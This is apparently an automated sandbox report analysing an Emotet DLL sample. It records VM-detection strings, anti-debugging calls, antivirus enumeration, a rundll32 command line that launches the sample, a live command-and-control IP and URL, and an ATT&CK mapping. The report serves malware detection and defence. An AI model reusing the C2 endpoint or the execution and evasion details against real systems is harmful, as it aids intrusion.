                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWiK
                      Source: Amcache.hve.22.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                      Source: WerFault.exe, 00000018.00000002.620008004.0000000004BD2000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618494839.0000000004BD2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 0000001C.00000002.693021814.00000214D4681000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpj
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.22.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693041446.00000214D4689000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.22.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 00000018.00000003.616852484.0000000004BD1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD1290 GetMagnificationLensCtxInformation,GetProcessHeap,GetMagnificationLensCtxInformation,HeapAlloc,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011107D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008707D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007807D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01111591 LdrInitializeThunk,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmp; Binary or memory string: Program Manager
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmp; Binary or memory string: Progman
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 2_2_6ECEA584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 2_2_6ECEA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.dr; Binary or memory string: c:\users\user\desktop\procexp.exe
                      Source: Amcache.hve.22.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 00000000.00000002.813823605.0000020AC5040000.00000004.00000001.sdmp; Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000000.00000002.813897976.0000020AC5102000.00000004.00000001.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.dr; Binary or memory string: procexp.exe

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match; File source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation1 | Path Interception | Process Injection112 | Masquerading21 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion2 | Security Account Manager | Security Software Discovery51 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories1 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information2 | DCSync | File and Directory Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll321 | Proc Filesystem | System Information Discovery24 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 532312  Sample: efELSMI5R4  Startdate: 02/12/2021  Architecture: WINDOWS  Score: 88

                      Signatures attached to the sample:
                      • Sigma detected: Emotet RunDLL32 Process Creation
                      • Multi AV Scanner detection for submitted file
                      • Yara detected Emotet

                      Process tree recovered from the graph (node numbers in parentheses; trailing counts of created registry values/files kept as shown in the graph):
                      efELSMI5R4 (2)
                        loaddll32.exe 1 (8)
                          rundll32.exe 2 (17)
                            • Hides that the sample has been downloaded from the Internet (zone.identifier)
                            rundll32.exe (32)
                              rundll32.exe (42)
                                → 45.63.5.129, 443, 49815 AS-CHOOPAUS United States
                                • System process connects to network (likely due to code injection or exploit)
                          cmd.exe 1 (20)
                            rundll32.exe (34)
                              rundll32.exe (46)
                          rundll32.exe (22)
                            rundll32.exe (36)
                          3 other processes (30)
                            rundll32.exe (40)
                        svchost.exe (10)
                          • Changes security center settings (notifications, updates, antivirus, firewall)
                          MpCmdRun.exe 1 (24)
                            conhost.exe (38)
                        svchost.exe 3 8 (13)
                          WerFault.exe (26)
                          WerFault.exe (28)
                        5 other processes (15)

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      efELSMI5R4.dll | 20% | Virustotal |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      7.2.rundll32.exe.c30000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      5.2.rundll32.exe.860000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      2.0.loaddll32.exe.1100000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
                      2.0.loaddll32.exe.1100000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      8.2.rundll32.exe.c50000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      2.0.loaddll32.exe.1100000.6.unpack | 100% | Avira | HEUR/AGEN.1110387
                      26.2.rundll32.exe.9a0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      6.2.rundll32.exe.770000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      13.2.rundll32.exe.35a0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      2.0.loaddll32.exe.1100000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
                      2.2.loaddll32.exe.1100000.0.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
                      http://crl.ver) | 0% | Avira URL Cloud | safe
                      https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
                      https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ | 0% | Avira URL Cloud | safe
                      http://help.disneyplus.com. | 0% | URL Reputation | safe
                      https://disneyplus.com/legal. | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://crl.ver) | svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                      https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://upx.sf.net | Amcache.hve.22.dr | false | | high
                      https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://help.disneyplus.com. | svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://disneyplus.com/legal. | svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        45.63.5.129 | unknown | United States | 20473 | AS-CHOOPAUS | true

                        General Information

                        Joe Sandbox Version: 34.0.0 Boulder Opal
                        Analysis ID: 532312
                        Start date: 02.12.2021
                        Start time: 00:42:16
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 12m 36s
                        Hypervisor based Inspection enabled: false
                        Report type: light
                        Sample file name: efELSMI5R4 (renamed file extension from none to dll)
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of new started processes analysed: 33
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal88.troj.evad.winDLL@41/21@0/1
                        EGA Information: Failed
                        HDC Information:
                        • Successful, ratio: 21.3% (good quality ratio 20.1%)
                        • Quality average: 71.2%
                        • Quality standard deviation: 25.5%
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes were analyzed; the report is missing behavior information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
